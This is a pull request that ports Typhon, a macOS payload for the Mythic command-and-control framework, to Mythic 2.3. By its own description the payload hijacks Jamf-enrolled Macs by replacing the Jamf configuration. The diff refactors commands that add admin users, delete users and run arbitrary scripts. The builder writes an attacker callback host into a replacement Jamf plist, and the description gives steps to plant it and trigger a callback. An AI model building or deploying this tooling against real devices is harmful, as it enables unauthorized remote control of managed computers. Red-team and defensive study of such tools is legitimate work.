### PR TITLE
Mythic 2.3

### DIFF
--- a/Payload_Type/typhon/Dockerfile
+++ b/Payload_Type/typhon/Dockerfile
@@ -1,2 +1,2 @@
 # pull in the appropriate language's payload container from itsafeaturemythic on dockerhub
-FROM itsafeaturemythic/python38_payload:0.0.6
+FROM itsafeaturemythic/python38_payload:0.1.2

--- a/Payload_Type/typhon/mythic/agent_functions/add_user.py
+++ b/Payload_Type/typhon/mythic/agent_functions/add_user.py
@@ -7,39 +7,64 @@ from mythic_payloadtype_container.MythicRPC import *
 class AddUserArguments(TaskArguments):
     def __init__(self, command_line):
         super().__init__(command_line)
-        self.args = {
-            "fullname": CommandParameter(
+        self.args = [
+            CommandParameter(
                 name="fullname", 
                 type=ParameterType.String,
-                required=True, 
-                description="Full name for the new user"
+                description="Full name for the new user",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             ),
-            "username": CommandParameter(
+            CommandParameter(
                 name="username", 
                 type=ParameterType.String,
-                required=True, 
-                description="Username for the new user"
+                description="Username for the new user",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             ),
-            "password": CommandParameter(
+            CommandParameter(
                 name="password", 
                 type=ParameterType.String,
-                required=True, 
-                description="Password for the new user"
+                description="Password for the new user",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             ),
-            "home_directory": CommandParameter(
+            CommandParameter(
                 name="home_directory", 
                 type=ParameterType.String,
-                required=True, 
-                description="Username for the new user"
+                description="Username for the new user",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             ),
-            "administrator" : CommandParameter(
+            CommandParameter(
                 name="administrator", 
                 type=ParameterType.Boolean,
-                required=True,
                 default_value=False,
-                description="Do you want to provide administrative access to this user?"
+                description="Do you want to provide administrative access to this user?",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             )
-        }
+        ]
 
     # you must implement this function so that you can parse out user typed input into your parameters or load your parameters based on some JSON input
     async def parse_arguments(self):

--- a/Payload_Type/typhon/mythic/agent_functions/add_user.py
+++ b/Payload_Type/typhon/mythic/agent_functions/add_user.py
@@ -5,8 +5,8 @@ from mythic_payloadtype_container.MythicRPC import *
 
 # create a class that extends TaskArguments class that will supply all the arguments needed for this command
 class AddUserArguments(TaskArguments):
-    def __init__(self, command_line):
-        super().__init__(command_line)
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
         self.args = [
             CommandParameter(
                 name="fullname", 

--- a/Payload_Type/typhon/mythic/agent_functions/builder.py
+++ b/Payload_Type/typhon/mythic/agent_functions/builder.py
@@ -33,7 +33,8 @@ class typhon(PayloadType):
         # create the payload
         try:
             c2_code = open(self.agent_code_path / "com.jamfsoftware.jamf.plist").read()
-            c2_code = c2_code.replace("JSS_URL_VALUE", self.c2info[0].get_parameters_dict()['callback_host'])
+            callback_url = self.c2info[0].get_parameters_dict()['callback_host'] + ':' + self.c2info[0].get_parameters_dict()['callback_port']
+            c2_code = c2_code.replace("JSS_URL_VALUE", callback_url)
             c2_code = c2_code.replace("UUID_HERE", self.uuid)
 
             if len(self.c2info) != 1:

--- a/Payload_Type/typhon/mythic/agent_functions/builder.py
+++ b/Payload_Type/typhon/mythic/agent_functions/builder.py
@@ -1,22 +1,29 @@
 from mythic_payloadtype_container.PayloadBuilder import *
 from mythic_payloadtype_container.MythicCommandBase import *
+from mythic_payloadtype_container.MythicRPC import *
 import sys
 import json
 
-# define your payload type class here, it must extend the PayloadType class though
+#define your payload type class here, it must extend the PayloadType class though
 class typhon(PayloadType):
 
     name = "typhon"  # name that would show up in the UI
     file_extension = "plist"  # default file extension to use when creating payloads
     author = "@calhall"  # author of the payload type
     supported_os = [SupportedOS.MacOS]  # supported OS and architecture combos
+
     wrapper = False  # does this payload type act as a wrapper for another payloads inside of it?
-    wrapped_payloads = []  # if so, which payload types. If you are writing a wrapper, you will need to modify this variable (adding in your wrapper's name) in the builder.py of each payload that you want to utilize your wrapper.
+    # if the payload supports any wrapper payloads, list those here
+    wrapped_payloads = [] # ex: "service_wrapper"
     note = """This payload is used to replace the Jamf config to hijack enrolled devices."""
     supports_dynamic_loading = False  # setting this to True allows users to only select a subset of commands when generating a payload
-    build_parameters = {}
+    build_parameters = [
+        #  these are all the build parameters that will be presented to the user when creating your payload
+        # we'll leave this blank for now
+    ]
     #  the names of the c2 profiles that your agent supports
     c2_profiles = ["jamfserver"]
+    translation_container = None
     # after your class has been instantiated by the mythic_service in this docker container and all required build parameters have values
     # then this function is called to actually build the payload
     async def build(self) -> BuildResponse:

--- a/Payload_Type/typhon/mythic/agent_functions/delete_user.py
+++ b/Payload_Type/typhon/mythic/agent_functions/delete_user.py
@@ -7,8 +7,8 @@ import base64
 
 # create a class that extends TaskArguments class that will supply all the arguments needed for this command
 class DeleteUserArguments(TaskArguments):
-    def __init__(self, command_line):
-        super().__init__(command_line)
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
         self.args = [
             CommandParameter(
                 name="username", 

--- a/Payload_Type/typhon/mythic/agent_functions/delete_user.py
+++ b/Payload_Type/typhon/mythic/agent_functions/delete_user.py
@@ -1,20 +1,27 @@
-from mythic_payloadtype_container.MythicCommandBase import *  # import the basics
-import json  # import any other code you might need
-# import the code for interacting with Files on the Mythic server
+from mythic_payloadtype_container.MythicCommandBase import *
 from mythic_payloadtype_container.MythicRPC import *
+import json
+import sys
+import base64
+
 
 # create a class that extends TaskArguments class that will supply all the arguments needed for this command
 class DeleteUserArguments(TaskArguments):
     def __init__(self, command_line):
         super().__init__(command_line)
-        self.args = {
-            "username": CommandParameter(
+        self.args = [
+            CommandParameter(
                 name="username", 
                 type=ParameterType.String,
-                required=True, 
-                description="Username for the user to be deleted"
+                description="Username for the user to be deleted",
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Defaults"
+                    )
+                ]
             )
-        }
+        ]
 
     # you must implement this function so that you can parse out user typed input into your parameters or load your parameters based on some JSON input
     async def parse_arguments(self):
@@ -34,12 +41,15 @@ class DeleteUserCommand(CommandBase):
     cmd = "delete_user"
     needs_admin = True
     help_cmd = "delete_user"
-    description = "Deletes a specified user through the Jamf agent."
+    description = ( 
+        "Deletes a specified user through the Jamf agent."
+    )
     version = 1
     author = "@calhall"
     argument_class = DeleteUserArguments
-    attackmapping = []
+    attackmapping = ['T1548.002']
     browser_script = None
+
 
     # this function is called after all of your arguments have been parsed and validated that each "required" parameter has a non-None value
     async def create_tasking(self, task: MythicTask) -> MythicTask:

--- a/Payload_Type/typhon/mythic/agent_functions/execute_command.py
+++ b/Payload_Type/typhon/mythic/agent_functions/execute_command.py
@@ -5,8 +5,8 @@ from mythic_payloadtype_container.MythicRPC import *
 
 # create a class that extends TaskArguments class that will supply all the arguments needed for this command
 class ExecuteArguments(TaskArguments):
-    def __init__(self, command_line):
-        super().__init__(command_line)
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
         self.args = {
             "script": CommandParameter(
                 name="script", type=ParameterType.String, description="Script to run"

--- a/Payload_Type/typhon/mythic/agent_functions/execute_command.py
+++ b/Payload_Type/typhon/mythic/agent_functions/execute_command.py
@@ -7,11 +7,11 @@ from mythic_payloadtype_container.MythicRPC import *
 class ExecuteArguments(TaskArguments):
     def __init__(self, command_line, **kwargs):
         super().__init__(command_line, **kwargs)
-        self.args = {
-            "script": CommandParameter(
+        self.args = [
+             CommandParameter(
                 name="script", type=ParameterType.String, description="Script to run"
             ),
-        }
+        ]
 
     # you must implement this function so that you can parse out user typed input into your parameters or load your parameters based on some JSON input
     async def parse_arguments(self):


### PR DESCRIPTION
Update to Typhon to run against Mythic 2.3 (tested against 2.3.13).

This should be able to close off [Issue #1](https://github.com/MythicAgents/typhon/issues/1).

# Testing

On a current Mythic 2.3.13 install run the command:

`./mythic-cli install github  https://github.com/sclow/typhon.git mythic-2.3 -f` 

On a Mac with Jamf installed (tested on Monterey), create a new typhon payload and copy plist to "/Library/Preferences/com.jamfsoftware.jamf.plist" and either wait about 15 mins or run `jamf policy id=1` to get an initial callback. 

Jamf naturally polls about every 15 mins, so expect delays between command submission and collection/execution.

## Commands 

Command | Syntax | Status
------- | ------ | -----------
add_user | `add_user` | Command returns "False" but user added to device.
delete_user | `delete_user` | Returns: "Attempting to delete home directory for {user} at {homedirectory}"
execute_command | `execute_command` | Works as expected.
